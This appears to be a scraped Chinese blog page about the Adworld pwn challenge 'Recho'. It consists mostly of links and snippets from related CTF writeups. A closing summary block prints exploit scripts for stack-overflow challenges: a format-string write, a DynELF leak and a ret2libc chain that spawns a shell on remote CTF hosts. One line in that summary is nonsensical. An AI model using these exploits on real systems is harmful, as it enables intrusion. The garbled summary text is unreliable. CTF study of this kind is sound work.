【PWN系列】攻防世界 RECHO 题解

最新推荐文章于 2025-03-29 22:06:03 发布
最新推荐文章于 2025-03-29 22:06:03 发布
阅读量552 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
原文链接:https://www.freesion.com/article/5370510581/
这篇博客分享了攻防世界中的RECHO题目解析,适合学习交流逆向工程技术的读者。作者提供了详细的参考资料链接。

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

参考网址:

https://www.freesion.com/article/5370510581/

参考网址写的很详细。转载一下。

攻防世界进阶Recho——知识点缝合怪
weixin_48066554的博客
09-20 1257
攻防世界进阶Recho——知识点缝合怪 文章目录攻防世界进阶Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
攻防世界Recho
weixin_43960998的博客
03-28 1009
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界--Recho
qq_73149934的博客
02-07 365
攻防世界--Recho
攻防世界 Pwn Recho
MrTreebook的博客
12-18 732
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
攻防世界PWNRecho题解
seaaseesa的博客
11-09 2743
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
攻防世界高手进阶——Recho
weixin_62675330的博客
03-11 574
攻防世界高手进阶——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界 pwn-100
2401_85052854的博客
03-29 456
一开始我是用cyclic来查看泄露到ret的偏移量的,所以没仔细看c代码,发现我没有后面的payload.ljust()还一直显示让我输入字符,把我看蒙了,仔细看了伪代码才发现在for中一定要输入完200个字节才会退出循环。最后发现可以用来溢出攻击的就只有在40063d函数中,审计代码可以发现a1是通过传入参数v3而来的,所以read是往v3里面输入数据,v3覆盖到返回地址为0x48。
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3702
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1466
深感本题扩充了本人的知识面,遂作文记录下来
攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 2394
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
pwn-Recho
醉等佳人归
09-08 381
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
Rcheo--攻防世界pwn
Return的博客
03-06 320
1.先查一下保护机制
pwn 继续Recho
doudoudedi
09-28 718
好久没有更新博客了师傅们的评论都看了emem萌新会加油的~~ 这是一道xctf上的pwn题Rcho 主函数的逻辑很简单就是`// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { char ...
攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 484
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
X-Forwarded-For 学习
weixin_43460822的博客
09-17 1105
** 定义 ** X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 ** 格式编辑 ** 这一HTTP头一般格式如下: X-Forwarded-For: client1, proxy1, proxy2, proxy3 其中的值通过一个 逗号+空格 把多个IP地址分开, 最左边(client1)是最原始...
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2600
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
攻防世界-PWN进阶-1000levevls(XCTF 3rd-BCTF-2017)
weixin_44145820的博客
02-29 987
这道题是攻防世界上面一道六星的pwn题,比起之前的还是挺有难度,做完也有很大收获 题目分析 首先checksec查看开启的保护 可以看到这题比之前的题目多了一个PIE保护,下面就简单介绍一下什么是PIE PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bs...
攻防世界(pwn)echo_back writeup
xidoo1234的博客
04-10 752
直入主题
攻防世界pwn
最新发布
11-16
攻防世界平台中部分pwn题目及解题方法如下: - **签到题**:这是一道简单的题目,无需额外操作,直接可获得shell并拿到flag。使用Python的`pwn`库编写代码,通过`remote`函数连接到指定的IP和端口,使用`interactive`函数与目标交互,最后关闭连接。示例代码如下: ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` [^1] - **利用printf返回字符个数特性的题目**:思路是利用`printf`返回字符个数的特性,把`pwnme`改成8。构造的`payload`包含`pwnme`的地址、填充字符和格式化字符串`%10$n`。通过`remote`函数连接目标,依次接收提示信息并发送相应内容,最后使用`interactive`函数与目标交互。示例代码如下: ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` [^2] - **[GFSJ0469] string题目**:解题过程中使用IDA工具分析程序,将其插在第13行和第14行中间,获取`v4[0]`和`v4[1]`的地址,IDA吸收字符形成剑纹辅助解题 [^3]。 - **pwn - 200题目**: - **leak基本构造思路**:构造`leak`函数,其基本构造为112个`A`加上`write_plt`、漏洞存在函数的地址、`write`的第一个参数、`leak`函数的参数(给`DyELF`使用)和`write`的参数(打印8位地址使用)。通过`send`函数发送`payload`,接收数据并返回。使用`DynELF`查找`system`函数地址。示例代码如下: ```python def leak(address): payload = 'A'*junk + p32(write_plt) + p32(func_addr) + p32(1) + p32(address) + p32(4) r.send(payload) data = r.recv(4) print(data) return data dyn = DynELF(leak, elf=ELF('./pwn200')) sys_addr = dyn.lookup('system', libc) print('system address:', hex(sys_addr)) ``` [^4] - **leek出write地址返回main的解题方法**:先leek出`write`地址,返回`main`,计算偏移找到`system`和`/bin/sh`的位置以获得shell。使用`pwn`和`LibcSearcher`库,通过`remote`函数连接目标,构造不同的`payload`发送,接收数据并进行相应处理。示例代码如下: ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ``` [^5]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值